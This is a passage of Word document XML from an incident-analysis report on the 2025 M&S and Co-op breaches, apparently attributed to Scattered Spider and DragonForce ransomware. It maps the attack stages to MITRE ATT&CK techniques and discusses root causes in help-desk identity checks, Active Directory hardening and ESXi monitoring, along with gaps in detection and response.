                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Data Encrypted for Impact (T1486)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1997FC38" w14:textId="7E098A42" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">M&amp;S VMware </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESXi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> virtual machines that supply core services were encrypted by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DragonForce</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> ransomware.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="68CACD57" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="66A5E9AE" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0602AB3B" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Service Stop / Inhibit Recovery (T1489 / T1490)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F6FA2F1" w14:textId="146C46B9" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Encryption of e-commerce, payments and logistics virtualization hosts, causing multi-week outage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2389068A" w14:textId="77777777" w:rsidR="001B28AA" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc234776714"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This mapping displays a cohesive, human-focused kill chain. Identity reconnaissance leads to a social-engineering pretext against the help desk, leading to credentials and bypassing MFA. Active Directory is then plundered for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> store to allow lateral movement, mass data collection, exfiltration and finally ransomware against the virtualization layer. Most importantly, only the latter steps depended on ordinary “hacking.” The critical actions were social and procedural.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B724B" w14:textId="7B1303E3" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.4 Root Cause and Security Control Failures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="3357C613" w14:textId="77777777" w:rsidR="001B28AA" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The root cause was immediate: the IT service desk failed to correctly validate the identity of a caller requesting modifications to credentials or MFA. This is a process and human factors failure, not a software vulnerability. It is the single most consequential control that failed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[7]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5EE54762" w14:textId="77777777" w:rsidR="001B28AA" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Human elements. Support personnel were tricked into accepting a convincing imitation. A confident caller can have their access reset without step-up verification (call a registered number </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>back, manager approval or in-person verification for privileged accounts). The entry point was not technological naïveté but susceptibility to social engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434B21A3" w14:textId="7F35CA2B" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Technical failures.  The fact that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exfiltratable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> means the domain-controller lacked control of access and tiered administration. After gaining a footing, poor segmentation facilitated a migration from a normal account context to Active Directory and ultimately to the virtualisation platform. Encryption of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> hosts indicates poor hardening and monitoring of the hypervisor layer, which is a high value target that is often under-protected compared to endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455F6F45" w14:textId="77777777" w:rsidR="001B28AA" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Organizational failures. The long stay period is evidence of inadequacies in detection and privileged access governance. An architectural stance that hadn’t fully implemented least-privilege and zero-trust principles, a flat trust architecture where compromising one identity resulted in domain dominance. Business-continuity dependencies (M&amp;S own-label model and exclusive supplier contracts) further compounded the operational effect when systems were taken offline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F8432B" w14:textId="77777777" w:rsidR="001B28AA" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc234776715"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The pattern fits nicely to the intrusion chain: the help-desk failure enabled T1566.004/T1621, the AD hardening failure enabled T1003.003, the segmentation failure enabled T1021, and the hypervisor exposure enabled T1486.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A705B3C" w14:textId="08BDB5E8" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.5 Threat Actor Profile and Motive</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="276FE6C4" w14:textId="77777777" w:rsidR="001B28AA" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The effort is associated with Scattered Spider (UNC3944), a loosely organised, mostly English-speaking collective notorious for their aggressive social engineering, SIM-swapping and help-desk manipulation. The organization in this campaign is thought to have used the ransomware-as-a-service platform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, an affiliate model where operators are supplied with ransomware tooling in exchange for a cut of the proceeds.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[9]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25F4D719" w14:textId="77777777" w:rsidR="001B28AA" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Motif. It’s all about the money. The double-extortion model maximises leverage: take data and then encrypt. Even a victim with strong backups suffers the danger of data disclosure. This is criminal enterprise, not state-sponsored espionage, although the operational complexity is on par with certain nation-state action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA01403" w14:textId="77777777" w:rsidR="001B28AA" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Skill. Scattered Spider is characterized not by exploit development, but by human manipulation at scale, coupled with fluent abuse of authorized administrative tooling (living-off-the-land). They know enterprise IT operations well enough to convincingly imitate insiders and to manage Active Directory and virtualization environments once inside, which is what makes them strong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5FDBB5" w14:textId="77777777" w:rsidR="001B28AA" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc234776716"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confidence of attribution. Confidence is strong but not complete. The CMC’s logic—one alleged actor, proximity in time, shared TTPs—pointed to common attribution and the July 2025 arrests of four people further confirm it. A lingering possibility is that various </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> affiliates targeted UK retail independently; the shared tradecraft makes a coordinated single-actor explanation the more parsimonious reading.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[3]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[8]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02CF5E66" w14:textId="22F8C9BB" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.6 Detection and Response Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7BB386D5" w14:textId="77777777" w:rsidR="00E4676A" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">From the evidence, detection was tardy relative to the intrusion. If the initial access was as early as February, and the disruption was only noticeable in late April, the actor had weeks or months of undiscovered presence. This suggests deficiencies in identity-anomaly identification (an employee </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>credential acting strange), in privileged-account monitoring, and in lateral movement and NTDS access telemetry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726BDD4E" w14:textId="77777777" w:rsidR="00E4676A" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Response, however, was decisive. This proactive decision by Co-op to take parts of its estate offline – enduring operational hardship to avoid wider encryption – is a justified containment approach and probably mitigated its harm compared to M&amp;S which suffered full </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> encryption. M&amp;S did the right thing by asking customers to change their passwords once the exfiltration was discovered. The role of national bodies and the post-incident review by the CMC show a mature UK ecosystem for dealing with systemic events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FA3688" w14:textId="77777777" w:rsidR="00E4676A" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc234776717"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The significant detection gaps were thus: (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) no timely alert on help-desk-driven credential/MFA changes for privileged users; (ii) insufficient monitoring of domain-controller access and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
